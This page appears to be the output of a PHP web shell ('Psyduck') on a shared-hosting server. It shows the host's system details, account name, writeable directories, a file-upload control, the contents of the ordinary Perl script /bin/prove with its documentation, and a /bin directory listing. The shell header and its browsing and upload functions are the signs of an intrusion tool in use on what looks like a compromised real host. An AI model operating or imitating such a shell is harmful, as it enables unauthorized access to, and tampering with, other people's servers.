Psyduck - 可達鴨 之 鴨力山大2


Server : LiteSpeed
System : Linux premium217.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User : alloknri ( 880)
PHP Version : 8.1.34
Disable Function : NONE
Directory :  /bin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //bin/prove
#!/usr/bin/perl -w

BEGIN { pop @INC if $INC[-1] eq '.' }
use strict;
use warnings;
use App::Prove;

my $app = App::Prove->new;
$app->process_args(@ARGV);
exit( $app->run ? 0 : 1 );

__END__

=head1 NAME

prove - Run tests through a TAP harness.

=head1 USAGE

 prove [options] [files or directories]

=head1 OPTIONS

Boolean options:

 -v,  --verbose         Print all test lines.
 -l,  --lib             Add 'lib' to the path for your tests (-Ilib).
 -b,  --blib            Add 'blib/lib' and 'blib/arch' to the path for
                        your tests
 -s,  --shuffle         Run the tests in random order.
 -c,  --color           Colored test output (default).
      --nocolor         Do not color test output.
      --count           Show the X/Y test count when not verbose
                        (default)
      --nocount         Disable the X/Y test count.
 -D   --dry             Dry run. Show test that would have run.
 -f,  --failures        Show failed tests.
 -o,  --comments        Show comments.
      --ignore-exit     Ignore exit status from test scripts.
 -m,  --merge           Merge test scripts' STDERR with their STDOUT.
 -r,  --recurse         Recursively descend into directories.
      --reverse         Run the tests in reverse order.
 -q,  --quiet           Suppress some test output while running tests.
 -Q,  --QUIET           Only print summary results.
 -p,  --parse           Show full list of TAP parse errors, if any.
      --directives      Only show results with TODO or SKIP directives.
      --timer           Print elapsed time after each test.
      --trap            Trap Ctrl-C and print summary on interrupt.
      --normalize       Normalize TAP output in verbose output
 -T                     Enable tainting checks.
 -t                     Enable tainting warnings.
 -W                     Enable fatal warnings.
 -w                     Enable warnings.
 -h,  --help            Display this help
 -?,                    Display this help
 -V,  --version         Display the version
 -H,  --man             Longer manpage for prove
      --norc            Don't process default .proverc

Options that take arguments:

 -I                     Library paths to include.
 -P                     Load plugin (searches App::Prove::Plugin::*.)
 -M                     Load a module.
 -e,  --exec            Interpreter to run the tests ('' for compiled
                        tests.)
      --ext             Set the extension for tests (default '.t')
      --harness         Define test harness to use.  See TAP::Harness.
      --formatter       Result formatter to use. See FORMATTERS.
      --source          Load and/or configure a SourceHandler. See
                        SOURCE HANDLERS.
 -a,  --archive out.tgz Store the resulting TAP in an archive file.
 -j,  --jobs N          Run N test jobs in parallel (try 9.)
      --state=opts      Control prove's persistent state.
      --statefile=file  Use `file` instead of `.prove` for state
      --rc=rcfile       Process options from rcfile
      --rules           Rules for parallel vs sequential processing.

=head1 NOTES

=head2 .proverc

If F<~/.proverc> or F<./.proverc> exist they will be read and any
options they contain processed before the command line options. Options
in F<.proverc> are specified in the same way as command line options:

    # .proverc
    --state=hot,fast,save
    -j9

Additional option files may be specified with the C<--rc> option.
Default option file processing is disabled by the C<--norc> option.

Under Windows and VMS the option file is named F<_proverc> rather than
F<.proverc> and is sought only in the current directory.

=head2 Reading from C<STDIN>

If you have a list of tests (or URLs, or anything else you want to test) in a
file, you can add them to your tests by using a '-':

 prove - < my_list_of_things_to_test.txt

See the C<README> in the C<examples> directory of this distribution.

=head2 Default Test Directory

If no files or directories are supplied, C<prove> looks for all files
matching the pattern C<t/*.t>.

=head2 Colored Test Output

Colored test output using L<TAP::Formatter::Color> is the default, but
if output is not to a terminal, color is disabled. You can override this by
adding the C<--color> switch.

Color support requires L<Term::ANSIColor> and, on windows platforms, also
L<Win32::Console::ANSI>. If the necessary module(s) are not installed
colored output will not be available.

=head2 Exit Code

If the tests fail C<prove> will exit with non-zero status.

=head2 Arguments to Tests

It is possible to supply arguments to tests. To do so separate them from
prove's own arguments with the arisdottle, '::'. For example

 prove -v t/mytest.t :: --url http://example.com

would run F<t/mytest.t> with the options '--url http://example.com'.
When running multiple tests they will each receive the same arguments.

=head2 C<--exec>

Normally you can just pass a list of Perl tests and the harness will know how
to execute them.  However, if your tests are not written in Perl or if you
want all tests invoked exactly the same way, use the C<-e>, or C<--exec>
switch:

 prove --exec '/usr/bin/ruby -w' t/
 prove --exec '/usr/bin/perl -Tw -mstrict -Ilib' t/
 prove --exec '/path/to/my/customer/exec'

=head2 C<--merge>

If you need to make sure your diagnostics are displayed in the correct
order relative to test results you can use the C<--merge> option to
merge the test scripts' STDERR into their STDOUT.

This guarantees that STDOUT (where the test results appear) and STDERR
(where the diagnostics appear) will stay in sync. The harness will
display any diagnostics your tests emit on STDERR.

Caveat: this is a bit of a kludge. In particular note that if anything
that appears on STDERR looks like a test result the test harness will
get confused. Use this option only if you understand the consequences
and can live with the risk.

=head2 C<--trap>

The C<--trap> option will attempt to trap SIGINT (Ctrl-C) during a test
run and display the test summary even if the run is interrupted

=head2 C<--state>

You can ask C<prove> to remember the state of previous test runs and
select and/or order the tests to be run based on that saved state.

The C<--state> switch requires an argument which must be a comma
separated list of one or more of the following options.

=over

=item C<last>

Run the same tests as the last time the state was saved. This makes it
possible, for example, to recreate the ordering of a shuffled test.

    # Run all tests in random order
    $ prove -b --state=save --shuffle

    # Run them again in the same order
    $ prove -b --state=last

=item C<failed>

Run only the tests that failed on the last run.

    # Run all tests
    $ prove -b --state=save

    # Run failures
    $ prove -b --state=failed

If you also specify the C<save> option newly passing tests will be
excluded from subsequent runs.

    # Repeat until no more failures
    $ prove -b --state=failed,save

=item C<passed>

Run only the passed tests from last time. Useful to make sure that no
new problems have been introduced.

=item C<all>

Run all tests in normal order. Multple options may be specified, so to
run all tests with the failures from last time first:

    $ prove -b --state=failed,all,save

=item C<hot>

Run the tests that most recently failed first. The last failure time of
each test is stored. The C<hot> option causes tests to be run in most-recent-
failure order.

    $ prove -b --state=hot,save

Tests that have never failed will not be selected. To run all tests with
the most recently failed first use

    $ prove -b --state=hot,all,save

This combination of options may also be specified thus

    $ prove -b --state=adrian

=item C<todo>

Run any tests with todos.

=item C<slow>

Run the tests in slowest to fastest order. This is useful in conjunction
with the C<-j> parallel testing switch to ensure that your slowest tests
start running first.

    $ prove -b --state=slow -j9

=item C<fast>

Run test tests in fastest to slowest order.

=item C<new>

Run the tests in newest to oldest order based on the modification times
of the test scripts.

=item C<old>

Run the tests in oldest to newest order.

=item C<fresh>

Run those test scripts that have been modified since the last test run.

=item C<save>

Save the state on exit. The state is stored in a file called F<.prove>
(F<_prove> on Windows and VMS) in the current directory.

=back

The C<--state> switch may be used more than once.

    $ prove -b --state=hot --state=all,save

=head2 --rules

The C<--rules> option is used to control which tests are run sequentially and
which are run in parallel, if the C<--jobs> option is specified. The option may
be specified multiple times, and the order matters.

The most practical use is likely to specify that some tests are not
"parallel-ready".  Since mentioning a file with --rules doesn't cause it to
be selected to run as a test, you can "set and forget" some rules preferences in
your .proverc file. Then you'll be able to take maximum advantage of the
performance benefits of parallel testing, while some exceptions are still run
in parallel.

=head3 --rules examples

    # All tests are allowed to run in parallel, except those starting with "p"
    --rules='seq=t/p*.t' --rules='par=**'

    # All tests must run in sequence except those starting with "p", which should be run parallel
    --rules='par=t/p*.t'

=head3 --rules resolution

=over 4

=item * By default, all tests are eligible to be run in parallel. Specifying any of your own rules removes this one.

=item * "First match wins". The first rule that matches a test will be the one that applies.

=item * Any test which does not match a rule will be run in sequence at the end of the run.

=item * The existence of a rule does not imply selecting a test. You must still specify the tests to run.

=item * Specifying a rule to allow tests to run in parallel does not make them run in parallel. You still need specify the number of parallel C<jobs> in your Harness object.

=back

=head3 --rules Glob-style pattern matching

We implement our own glob-style pattern matching for --rules. Here are the
supported patterns:

    ** is any number of characters, including /, within a pathname
    * is zero or more characters within a filename/directory name
    ? is exactly one character within a filename/directory name
    {foo,bar,baz} is any of foo, bar or baz.
    \ is an escape character

=head3 More advanced specifications for parallel vs sequence run rules

If you need more advanced management of what runs in parallel vs in sequence, see
the associated 'rules' documentation in L<TAP::Harness> and L<TAP::Parser::Scheduler>.
If what's possible directly through C<prove> is not sufficient, you can write your own
harness to access these features directly.

=head2 @INC

prove introduces a separation between "options passed to the perl which
runs prove" and "options passed to the perl which runs tests"; this
distinction is by design. Thus the perl which is running a test starts
with the default C<@INC>. Additional library directories can be added
via the C<PERL5LIB> environment variable, via -Ifoo in C<PERL5OPT> or
via the C<-Ilib> option to F<prove>.

=head2 Taint Mode

Normally when a Perl program is run in taint mode the contents of the
C<PERL5LIB> environment variable do not appear in C<@INC>.

Because C<PERL5LIB> is often used during testing to add build
directories to C<@INC> prove passes the names of any directories found
in C<PERL5LIB> as -I switches. The net effect of this is that
C<PERL5LIB> is honoured even when prove is run in taint mode.


=head1 FORMATTERS

You can load a custom L<TAP::Parser::Formatter>:

  prove --formatter MyFormatter

=head1 SOURCE HANDLERS

You can load custom L<TAP::Parser::SourceHandler>s, to change the way the
parser interprets particular I<sources> of TAP.

  prove --source MyHandler --source YetAnother t

If you want to provide config to the source you can use:

  prove --source MyCustom \
        --source Perl --perl-option 'foo=bar baz' --perl-option avg=0.278 \
        --source File --file-option extensions=.txt --file-option extensions=.tmp t
        --source pgTAP --pgtap-option pset=format=html --pgtap-option pset=border=2

Each C<--$source-option> option must specify a key/value pair separated by an
C<=>. If an option can take multiple values, just specify it multiple times,
as with the C<extensions=> examples above. If the option should be a hash
reference, specify the value as a second pair separated by a C<=>, as in the
C<pset=> examples above (escape C<=> with a backslash).

All C<--sources> are combined into a hash, and passed to L<TAP::Harness/new>'s
C<sources> parameter.

See L<TAP::Parser::IteratorFactory> for more details on how configuration is
passed to I<SourceHandlers>.

=head1 PLUGINS

Plugins can be loaded using the C<< -PI<plugin> >> syntax, eg:

  prove -PMyPlugin

This will search for a module named C<App::Prove::Plugin::MyPlugin>, or failing
that, C<MyPlugin>.  If the plugin can't be found, C<prove> will complain & exit.

You can pass arguments to your plugin by appending C<=arg1,arg2,etc> to the
plugin name:

  prove -PMyPlugin=fou,du,fafa

Please check individual plugin documentation for more details.

=head2 Available Plugins

For an up-to-date list of plugins available, please check CPAN:

L<http://search.cpan.org/search?query=App%3A%3AProve+Plugin>

=head2 Writing Plugins

Please see L<App::Prove/PLUGINS>.

=cut

# vim:ts=4:sw=4:et:sta
Name
Size
Permissions
Options
7za
0.045 KB
-rwxr-xr-x
GET
15.837 KB
-rwxr-xr-x
Mail
408.891 KB
-rwxr-xr-x
[
53.578 KB
-rwxr-xr-x
aclocal
35.623 KB
-rwxr-xr-x
aclocal-1.16
35.623 KB
-rwxr-xr-x
addr2line
33.422 KB
-rwxr-xr-x
animate
11.844 KB
-rwxr-xr-x
ar
61.961 KB
-rwxr-xr-x
arch
37.336 KB
-rwxr-xr-x
arpaname
11.82 KB
-rwxr-xr-x
as
889.906 KB
-rwxr-xr-x
aspell
159.5 KB
-rwxr-xr-x
at
1.012 KB
-rwxr-xr-x
atq
1.014 KB
-rwxr-xr-x
atrm
1.016 KB
-rwxr-xr-x
autoconf
14.422 KB
-rwxr-xr-x
autoheader
8.334 KB
-rwxr-xr-x
autom4te
31.427 KB
-rwxr-xr-x
automake
251.903 KB
-rwxr-xr-x
automake-1.16
251.903 KB
-rwxr-xr-x
autoreconf
20.572 KB
-rwxr-xr-x
autoscan
16.723 KB
-rwxr-xr-x
autoupdate
33.078 KB
-rwxr-xr-x
awk
669.773 KB
-rwxr-xr-x
b2sum
57.688 KB
-rwxr-xr-x
base32
41.469 KB
-rwxr-xr-x
base64
41.492 KB
-rwxr-xr-x
basename
37.414 KB
-rwxr-xr-x
bash
1.1 MB
-rwxr-xr-x
bashbug-64
7.176 KB
-rwxr-xr-x
batch
0.134 KB
-rwxr-xr-x
bison
437.719 KB
-rwxr-xr-x
bunzip2
36.859 KB
-rwxr-xr-x
bzcat
36.859 KB
-rwxr-xr-x
bzcmp
2.078 KB
-rwxr-xr-x
bzdiff
2.078 KB
-rwxr-xr-x
bzgrep
1.638 KB
-rwxr-xr-x
bzip2
36.859 KB
-rwxr-xr-x
bzip2recover
16.438 KB
-rwxr-xr-x
bzless
1.229 KB
-rwxr-xr-x
bzmore
1.229 KB
-rwxr-xr-x
c++
1.21 MB
-rwxr-xr-x
c++filt
28.891 KB
-rwxr-xr-x
c89
0.219 KB
-rwxr-xr-x
c99
0.21 KB
-rwxr-xr-x
cagefs_enter.proxied
1.031 KB
-rwxr-xr-x
cal
65.984 KB
-rwxr-xr-x
captoinfo
85.313 KB
-rwxr-xr-x
cat
37.461 KB
-rwxr-xr-x
catchsegv
3.206 KB
-rwxr-xr-x
cc
1.21 MB
-rwxr-xr-x
chgrp
66.273 KB
-rwxr-xr-x
chmod
62.195 KB
-rwxr-xr-x
chown
70.289 KB
-rwxr-xr-x
chrt
37.188 KB
-rwxr-xr-x
cksum
37.391 KB
-rwxr-xr-x
cldetect
10.345 KB
-rwxr-xr-x
clear
12.539 KB
-rwxr-xr-x
clusterdb
70.234 KB
-rwxr-xr-x
cmp
103.758 KB
-rwxr-xr-x
col
29.008 KB
-rwxr-xr-x
colcrt
16.477 KB
-rwxr-xr-x
colrm
24.883 KB
-rwxr-xr-x
column
49.469 KB
-rwxr-xr-x
comm
41.563 KB
-rwxr-xr-x
compare
11.852 KB
-rwxr-xr-x
composite
11.836 KB
-rwxr-xr-x
conjure
11.836 KB
-rwxr-xr-x
convert
11.836 KB
-rwxr-xr-x
cp
148.016 KB
-rwxr-xr-x
cpan
8.174 KB
-rwxr-xr-x
cpp
1.21 MB
-rwxr-xr-x
createdb
70.219 KB
-rwxr-xr-x
createuser
74.625 KB
-rwxr-xr-x
crontab
1.488 KB
-rwxr-xr-x
crontab.cagefs
54.156 KB
-rwxr-xr-x
csplit
53.68 KB
-rwxr-xr-x
curl
230.078 KB
-rwxr-xr-x
cut
49.516 KB
-rwxr-xr-x
date
105.953 KB
-rwxr-xr-x
dd
77.969 KB
-rwxr-xr-x
delv
42.461 KB
-rwxr-xr-x
df
91.086 KB
-rwxr-xr-x
diff
268.008 KB
-rwxr-xr-x
diff3
128.602 KB
-rwxr-xr-x
dig
162.18 KB
-rwxr-xr-x
dir
139.898 KB
-rwxr-xr-x
dircolors
49.555 KB
-rwxr-xr-x
dirname
33.359 KB
-rwxr-xr-x
display
11.844 KB
-rwxr-xr-x
dnstap-read
20.43 KB
-rwxr-xr-x
dropdb
66.023 KB
-rwxr-xr-x
dropuser
65.992 KB
-rwxr-xr-x
du
107 KB
-rwxr-xr-x
echo
37.352 KB
-rwxr-xr-x
egrep
0.027 KB
-rwxr-xr-x
enc2xs
40.975 KB
-rwxr-xr-x
enchant
21.078 KB
-rwxr-xr-x
enchant-lsmod
13.094 KB
-rwxr-xr-x
env
41.352 KB
-rwxr-xr-x
eps2eps
0.624 KB
-rwxr-xr-x
eqn
232.156 KB
-rwxr-xr-x
ex
1.13 MB
-rwxr-xr-x
expand
41.594 KB
-rwxr-xr-x
expr
49.57 KB
-rwxr-xr-x
factor
85.969 KB
-rwxr-xr-x
false
33.32 KB
-rwxr-xr-x
fc-cache
0.129 KB
-rwxr-xr-x
fc-cache-64
20.352 KB
-rwxr-xr-x
fc-cat
16.352 KB
-rwxr-xr-x
fc-conflist
12.25 KB
-rwxr-xr-x
fc-list
12.25 KB
-rwxr-xr-x
fc-match
16.258 KB
-rwxr-xr-x
fc-pattern
12.258 KB
-rwxr-xr-x
fc-query
12.242 KB
-rwxr-xr-x
fc-scan
12.258 KB
-rwxr-xr-x
fc-validate
16.258 KB
-rwxr-xr-x
fgrep
0.027 KB
-rwxr-xr-x
file
24.688 KB
-rwxr-xr-x
find
223.273 KB
-rwxr-xr-x
flex
428.445 KB
-rwxr-xr-x
flex++
428.445 KB
-rwxr-xr-x
flock
33.195 KB
-rwxr-xr-x
fmt
45.492 KB
-rwxr-xr-x
fold
41.414 KB
-rwxr-xr-x
free
20.789 KB
-rwxr-xr-x
freetype-config
4.313 KB
-rwxr-xr-x
funzip
36.625 KB
-rwxr-xr-x
g++
1.21 MB
-rwxr-xr-x
gawk
669.773 KB
-rwxr-xr-x
gcc
1.21 MB
-rwxr-xr-x
gcc-ar
36.656 KB
-rwxr-xr-x
gcc-nm
36.656 KB
-rwxr-xr-x
gcc-ranlib
36.656 KB
-rwxr-xr-x
gcov
1.31 MB
-rwxr-xr-x
gcov-dump
570.961 KB
-rwxr-xr-x
gcov-tool
607.773 KB
-rwxr-xr-x
gem
0.529 KB
-rwxr-xr-x
gencat
24.836 KB
-rwxr-xr-x
geoiplookup
21.891 KB
-rwxr-xr-x
geoiplookup6
21.648 KB
-rwxr-xr-x
geqn
232.156 KB
-rwxr-xr-x
getconf
32.461 KB
-rwxr-xr-x
getent
33.125 KB
-rwxr-xr-x
getopt
20.531 KB
-rwxr-xr-x
ghostscript
12.352 KB
-rwxr-xr-x
git
3.67 MB
-rwxr-xr-x
git-receive-pack
3.67 MB
-rwxr-xr-x
git-shell
2.13 MB
-rwxr-xr-x
git-upload-archive
3.67 MB
-rwxr-xr-x
git-upload-pack
3.67 MB
-rwxr-xr-x
gm
7.82 KB
-rwxr-xr-x
gmake
235.32 KB
-rwxr-xr-x
gneqn
0.887 KB
-rwxr-xr-x
gnroff
3.234 KB
-rwxr-xr-x
gpg
1.04 MB
-rwxr-xr-x
gpg-agent
419.297 KB
-rwxr-xr-x
gpg-error
34.156 KB
-rwxr-xr-x
gpg-zip
3.442 KB
-rwxr-xr-x
gpgsplit
87.023 KB
-rwxr-xr-x
gpgv
451.508 KB
-rwxr-xr-x
gpic
293.844 KB
-rwxr-xr-x
gprof
103.352 KB
-rwxr-xr-x
grep
193.633 KB
-rwxr-xr-x
groff
124.922 KB
-rwxr-xr-x
grops
191.141 KB
-rwxr-xr-x
grotty
141.898 KB
-rwxr-xr-x
groups
37.391 KB
-rwxr-xr-x
gs
12.352 KB
-rwxr-xr-x
gsnd
0.271 KB
-rwxr-xr-x
gsoelim
42.555 KB
-rwxr-xr-x
gtar
448.992 KB
-rwxr-xr-x
gtbl
154.609 KB
-rwxr-xr-x
gtroff
805.023 KB
-rwxr-xr-x
gunzip
2.29 KB
-rwxr-xr-x
gzexe
6.226 KB
-rwxr-xr-x
gzip
94.672 KB
-rwxr-xr-x
h2ph
28.693 KB
-rwxr-xr-x
h2xs
59.439 KB
-rwxr-xr-x
head
45.5 KB
-rwxr-xr-x
hexdump
57.5 KB
-rwxr-xr-x
host
142.289 KB
-rwxr-xr-x
hostid
33.336 KB
-rwxr-xr-x
hostname
21.156 KB
-rwxr-xr-x
hunspell
144.695 KB
-rwxr-xr-x
iconv
61.43 KB
-rwxr-xr-x
id
45.438 KB
-rwxr-xr-x
identify
11.844 KB
-rwxr-xr-x
idn
39.406 KB
-rwxr-xr-x
ifnames
4.031 KB
-rwxr-xr-x
import
11.836 KB
-rwxr-xr-x
infocmp
61.047 KB
-rwxr-xr-x
infotocap
85.313 KB
-rwxr-xr-x
install
156.164 KB
-rwxr-xr-x
instmodsh
4.096 KB
-rwxr-xr-x
ionice
28.984 KB
-rwxr-xr-x
ipcrm
28.992 KB
-rwxr-xr-x
ipcs
53.398 KB
-rwxr-xr-x
isosize
24.875 KB
-rwxr-xr-x
ispell
0.965 KB
-rwxr-xr-x
join
53.695 KB
-rwxr-xr-x
kill
37.281 KB
-rwxr-xr-x
ld
1.71 MB
-rwxr-xr-x
ld.bfd
1.71 MB
-rwxr-xr-x
ldd
5.313 KB
-rwxr-xr-x
less
173.758 KB
-rwxr-xr-x
lessecho
12.398 KB
-rwxr-xr-x
lesskey
21.992 KB
-rwxr-xr-x
lesspipe.sh
3.069 KB
-rwxr-xr-x
lex
428.445 KB
-rwxr-xr-x
libnetcfg
15.405 KB
-rwxr-xr-x
libtool
359.105 KB
-rwxr-xr-x
libtoolize
126.169 KB
-rwxr-xr-x
link
33.336 KB
-rwxr-xr-x
ln
70.5 KB
-rwxr-xr-x
locale
56.445 KB
-rwxr-xr-x
localedef
307.469 KB
-rwxr-xr-x
logger
49.984 KB
-rwxr-xr-x
login
40.961 KB
-rwxr-xr-x
logname
33.344 KB
-rwxr-xr-x
look
16.453 KB
-rwxr-xr-x
ls
139.891 KB
-rwxr-xr-x
lynx
1.84 MB
-rwxr-xr-x
m4
185.563 KB
-rwxr-xr-x
mail
408.891 KB
-rwxr-xr-x
mailx
408.891 KB
-rwxr-xr-x
make
235.32 KB
-rwxr-xr-x
make-dummy-cert
0.596 KB
-rwxr-xr-x
mariadb
5.35 MB
-rwxr-xr-x
mariadb-access
109.484 KB
-rwxr-xr-x
mariadb-admin
4.89 MB
-rwxr-xr-x
mariadb-binlog
5.16 MB
-rwxr-xr-x
mariadb-check
4.89 MB
-rwxr-xr-x
mariadb-conv
4.59 MB
-rwxr-xr-x
mariadb-convert-table-format
4.283 KB
-rwxr-xr-x
mariadb-dump
4.99 MB
-rwxr-xr-x
mariadb-dumpslow
8.186 KB
-rwxr-xr-x
mariadb-embedded
24.6 MB
-rwxr-xr-x
mariadb-find-rows
3.353 KB
-rwxr-xr-x
mariadb-hotcopy
34.665 KB
-rwxr-xr-x
mariadb-import
4.88 MB
-rwxr-xr-x
mariadb-plugin
4.57 MB
-rwxr-xr-x
mariadb-secure-installation
13.665 KB
-rwxr-xr-x
mariadb-setpermission
17.703 KB
-rwxr-xr-x
mariadb-show
4.88 MB
-rwxr-xr-x
mariadb-slap
4.89 MB
-rwxr-xr-x
mariadb-tzinfo-to-sql
4.57 MB
-rwxr-xr-x
mariadb-waitpid
4.56 MB
-rwxr-xr-x
mc
1.3 MB
-rwxr-xr-x
mcdiff
1.3 MB
-rwxr-xr-x
mcedit
1.3 MB
-rwxr-xr-x
mcookie
33.266 KB
-rwxr-xr-x
mcview
1.3 MB
-rwxr-xr-x
md5sum
45.539 KB
-rwxr-xr-x
mesg
16.359 KB
-rwxr-xr-x
mkdir
82.695 KB
-rwxr-xr-x
mkfifo
66.461 KB
-rwxr-xr-x
mktemp
45.664 KB
-rwxr-xr-x
mogrify
11.836 KB
-rwxr-xr-x
montage
11.836 KB
-rwxr-xr-x
more
44.938 KB
-rwxr-xr-x
msql2mysql
1.412 KB
-rwxr-xr-x
mv
143.953 KB
-rwxr-xr-x
my_print_defaults
4.56 MB
-rwxr-xr-x
mysql
5.35 MB
-rwxr-xr-x
mysql_config
4.467 KB
-rwxr-xr-x
mysql_find_rows
3.353 KB
-rwxr-xr-x
mysql_waitpid
4.56 MB
-rwxr-xr-x
mysqlaccess
109.484 KB
-rwxr-xr-x
mysqladmin
4.89 MB
-rwxr-xr-x
mysqlbinlog
5.16 MB
-rwxr-xr-x
mysqlcheck
4.89 MB
-rwxr-xr-x
mysqldump
4.99 MB
-rwxr-xr-x
mysqlimport
4.88 MB
-rwxr-xr-x
mysqlshow
4.88 MB
-rwxr-xr-x
mytop
72.028 KB
-rwxr-xr-x
namei
33.102 KB
-rwxr-xr-x
nano
247.938 KB
-rwxr-xr-x
neqn
0.887 KB
-rwxr-xr-x
nice
37.328 KB
-rwxr-xr-x
nl
45.555 KB
-rwxr-xr-x
nm
50.375 KB
-rwxr-xr-x
nohup
37.414 KB
-rwxr-xr-x
nproc
37.406 KB
-rwxr-xr-x
nroff
3.234 KB
-rwxr-xr-x
nslookup
146.258 KB
-rwxr-xr-x
nsupdate
73.055 KB
-rwxr-xr-x
numfmt
65.641 KB
-rwxr-xr-x
objcopy
240.07 KB
-rwxr-xr-x
objdump
419.758 KB
-rwxr-xr-x
od
73.805 KB
-rwxr-xr-x
openssl
745.953 KB
-rwxr-xr-x
pango-list
11.875 KB
-rwxr-xr-x
pango-view
57.438 KB
-rwxr-xr-x
passwd
1.02 KB
-rwxr-xr-x
paste
37.383 KB
-rwxr-xr-x
patch
206.461 KB
-rwxr-xr-x
pathchk
37.328 KB
-rwxr-xr-x
pdf2dsc
0.682 KB
-rwxr-xr-x
pdf2ps
0.888 KB
-rwxr-xr-x
perl
12.43 KB
-rwxr-xr-x
perl5.26.3
12.43 KB
-rwxr-xr-x
perlbug
44.393 KB
-rwxr-xr-x
perldoc
0.115 KB
-rwxr-xr-x
perlivp
10.56 KB
-rwxr-xr-x
perlml
6.859 KB
-rwxr-xr-x
perlthanks
44.393 KB
-rwxr-xr-x
pg_dump
399.43 KB
-rwxr-xr-x
pg_dumpall
107.109 KB
-rwxr-xr-x
pg_restore
173.344 KB
-rwxr-xr-x
pgrep
28.844 KB
-rwxr-xr-x
php
0.915 KB
-rwxr-xr-x
pic
293.844 KB
-rwxr-xr-x
piconv
8.077 KB
-rwxr-xr-x
pinentry
2.348 KB
-rwxr-xr-x
pinentry-curses
77.891 KB
-rwxr-xr-x
ping
66.125 KB
-rwxr-xr-x
pinky
41.461 KB
-rwxr-xr-x
pkg-config
40.039 KB
-rwxr-xr-x
pkgconf
40.039 KB
-rwxr-xr-x
pkill
28.844 KB
-rwxr-xr-x
pl2pm
4.427 KB
-rwxr-xr-x
pmap
32.781 KB
-rwxr-xr-x
pod2html
4.037 KB
-rwxr-xr-x
pod2man
14.682 KB
-rwxr-xr-x
pod2text
10.55 KB
-rwxr-xr-x
pod2usage
3.855 KB
-rwxr-xr-x
podchecker
3.572 KB
-rwxr-xr-x
podselect
2.468 KB
-rwxr-xr-x
post-grohtml
238.727 KB
-rwxr-xr-x
pr
82.148 KB
-rwxr-xr-x
pre-grohtml
130.555 KB
-rwxr-xr-x
precat
5.523 KB
-rwxr-xr-x
preunzip
5.523 KB
-rwxr-xr-x
prezip
5.523 KB
-rwxr-xr-x
prezip-bin
11.977 KB
-rwxr-xr-x
printenv
33.32 KB
-rwxr-xr-x
printf
53.563 KB
-rwxr-xr-x
prove
13.244 KB
-rwxr-xr-x
ps
134.75 KB
-rwxr-xr-x
ps2ascii
0.616 KB
-rwxr-xr-x
ps2epsi
2.688 KB
-rwxr-xr-x
ps2pdf
0.266 KB
-rwxr-xr-x
ps2pdf12
0.21 KB
-rwxr-xr-x
ps2pdf13
0.21 KB
-rwxr-xr-x
ps2pdf14
0.21 KB
-rwxr-xr-x
ps2pdfwr
1.071 KB
-rwxr-xr-x
ps2ps
0.632 KB
-rwxr-xr-x
ps2ps2
0.653 KB
-rwxr-xr-x
psql
644.328 KB
-rwxr-xr-x
ptx
77.992 KB
-rwxr-xr-x
pwd
37.422 KB
-rwxr-xr-x
pwdx
12.68 KB
-rwxr-xr-x
python2
7.844 KB
-rwxr-xr-x
python2.7
7.844 KB
-rwxr-xr-x
python3
11.594 KB
-rwxr-xr-x
python3.6
11.594 KB
-rwxr-xr-x
python3.6m
11.594 KB
-rwxr-xr-x
ranlib
61.969 KB
-rwxr-xr-x
readelf
624.539 KB
-rwxr-xr-x
readlink
45.883 KB
-rwxr-xr-x
realpath
49.945 KB
-rwxr-xr-x
recode
47.031 KB
-rwxr-xr-x
reindexdb
70.32 KB
-rwxr-xr-x
rename
16.5 KB
-rwxr-xr-x
renew-dummy-cert
0.708 KB
-rwxr-xr-x
renice
16.461 KB
-rwxr-xr-x
replace
4.54 MB
-rwxr-xr-x
reset
24.758 KB
-rwxr-xr-x
rev
12.453 KB
-rwxr-xr-x
rm
70.375 KB
-rwxr-xr-x
rmdir
45.461 KB
-rwxr-xr-x
rnano
247.938 KB
-rwxr-xr-x
rsync
510.148 KB
-rwxr-xr-x
ruby
11.844 KB
-rwxr-xr-x
run-with-aspell
0.083 KB
-rwxr-xr-x
rvi
1.13 MB
-rwxr-xr-x
rview
1.13 MB
-rwxr-xr-x
rvim
2.93 MB
-rwxr-xr-x
scalar
2.18 MB
-rwxr-xr-x
scl
36.867 KB
-rwxr-xr-x
scl_enabled
0.252 KB
-rwxr-xr-x
scl_source
1.819 KB
-rwxr-xr-x
scp
102.836 KB
-rwxr-xr-x
screen
482.461 KB
-rwxr-xr-x
script
36.797 KB
-rwxr-xr-x
sdiff
105.328 KB
-rwxr-xr-x
sed
115.477 KB
-rwxr-xr-x
selectorctl
7.629 KB
-rwxr-xr-x
seq
53.445 KB
-rwxr-xr-x
setsid
16.375 KB
-rwxr-xr-x
setterm
45.125 KB
-rwxr-xr-x
sftp
159.742 KB
-rwxr-xr-x
sh
1.1 MB
-rwxr-xr-x
sha1sum
45.547 KB
-rwxr-xr-x
sha224sum
45.578 KB
-rwxr-xr-x
sha256sum
45.586 KB
-rwxr-xr-x
sha384sum
45.594 KB
-rwxr-xr-x
sha512sum
45.586 KB
-rwxr-xr-x
shred
61.852 KB
-rwxr-xr-x
shuf
58.094 KB
-rwxr-xr-x
size
33.25 KB
-rwxr-xr-x
skill
28.797 KB
-rwxr-xr-x
slabtop
20.844 KB
-rwxr-xr-x
sleep
37.391 KB
-rwxr-xr-x
snice
28.797 KB
-rwxr-xr-x
soelim
42.555 KB
-rwxr-xr-x
sort
123.469 KB
-rwxr-xr-x
spell
0.119 KB
-rwxr-xr-x
splain
18.701 KB
-rwxr-xr-x
split
58.047 KB
-rwxr-xr-x
sprof
28.672 KB
-rwxr-xr-x
sqlite3
1.28 MB
-rwxr-xr-x
ssh
757.469 KB
-rwxr-xr-x
ssh-add
346.109 KB
-rwxr-xr-x
ssh-agent
325.586 KB
-rwxr-xr-x
ssh-copy-id
10.443 KB
-rwxr-xr-x
ssh-keygen
427.172 KB
-rwxr-xr-x
ssh-keyscan
428.516 KB
-rwxr-xr-x
stat
86.164 KB
-rwxr-xr-x
stdbuf
49.5 KB
-rwxr-xr-x
strace
1.94 MB
-rwxr-xr-x
stream
11.828 KB
-rwxr-xr-x
strings
37.43 KB
-rwxr-xr-x
strip
240.094 KB
-rwxr-xr-x
stty
77.609 KB
-rwxr-xr-x
sum
45.531 KB
-rwxr-xr-x
sync
37.359 KB
-rwxr-xr-x
tabs
16.555 KB
-rwxr-xr-x
tac
41.492 KB
-rwxr-xr-x
tail
74.133 KB
-rwxr-xr-x
tar
448.992 KB
-rwxr-xr-x
taskset
37.258 KB
-rwxr-xr-x
tbl
154.609 KB
